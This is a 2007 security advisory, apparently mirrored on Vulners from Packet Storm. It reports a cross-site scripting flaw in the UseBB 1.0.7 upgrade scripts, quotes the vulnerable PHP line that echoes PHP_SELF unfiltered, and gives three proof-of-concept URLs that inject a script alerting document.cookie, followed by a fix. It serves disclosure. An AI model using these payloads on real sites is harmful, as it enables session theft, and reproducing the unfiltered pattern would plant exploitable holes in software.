Lucene search

K

usebb-xss.txt

🗓️ 23 Jul 2007 00:00:00Reported by S4miType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

UseBB version: 1.0.7, Cross Site Scripting (XSS) vulnerability in installation file

Show more
Code
`#############################################################  
# Script...............: UseBB version: 1.0.7 #  
# Script Site..........: http://www.usebb.net #  
# Vulnerability........: Cross Site Scripting (XSS) #  
# Acces................: Remote #  
# level................: Dangerous #  
# Author...............: S4mi #  
# Contact..............: s4mi[at]LinuxMail.org #  
#############################################################  
  
The affected Files :  
====================  
/UseBB/install/upgrade-0-2-3.php  
/UseBB/install/upgrade-0-3.php  
/UseBB/install/upgrade-0-4.php  
  
vuln Code: line ~ 86  
=====================  
[code]  
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden"   
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step   
'.$step : 'Continue to step '.$step ) . '" /></p></form>';  
[/code]  
  
The variables PHP_SELF is used without filtering  
  
PoC :  
====================  
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>  
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>  
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>  
  
Solution :  
====================  
  
filtre the PHP_SELF  
or you know what's the best lool : Delete the Install directory :D  
  
Shoutz :  
====================  
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
28
.json
Report